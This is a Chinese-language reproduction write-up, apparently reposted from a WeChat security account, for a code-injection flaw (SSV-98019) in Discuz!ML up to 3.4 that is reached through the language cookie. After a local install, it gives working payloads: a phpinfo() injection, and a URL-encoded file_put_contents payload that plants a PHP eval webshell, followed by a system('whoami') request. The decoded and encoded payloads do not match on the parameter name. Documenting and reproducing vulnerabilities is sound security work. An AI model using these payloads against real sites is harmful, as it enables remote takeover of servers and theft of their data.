一、背景

漏洞编号：SSV-98019

影响范围： Discuz!ML (<= 3.4)

漏洞影响：漏洞在于cookie的语言可控并且没有严格过滤，注入后导致可以远程代码执行，通过利用漏洞可直接getshell。

二、漏洞复现

0x01环境搭建

直接官网下载即可http://discuz.ml/download

将压缩包解压至phpstudy网站根目录，浏览器访问upload目录即可

开始安装

0x02漏洞复现

访问127.0.0.1/discuz!ml3.3/upload/home.php，访问别的php文件也可以，cookie字段中会出现xxxx_xxxx_language字段，根本原因就是这个字段存在注入，导致的RCE

漏洞在于cookie的语言可控并且没有严格过滤，注入后导致可以远程代码执行抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().'，成功执行，

构造一句话,连接caidao

payload：%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27

实际为：'.+file_put_contents('shell.php',urldecode('<?phpeval($_POST["cmd"]);?>')).'

可看到路径下生成shell.php，链接密码为cmd

访问http://127.0.0.1/vot-discuz.ml/upload/shell.php?cmd=system('whoami');即成功执行命令

本文始发于微信公众号（凌晨安全）：Discuz!ML3.X代码注入漏洞复现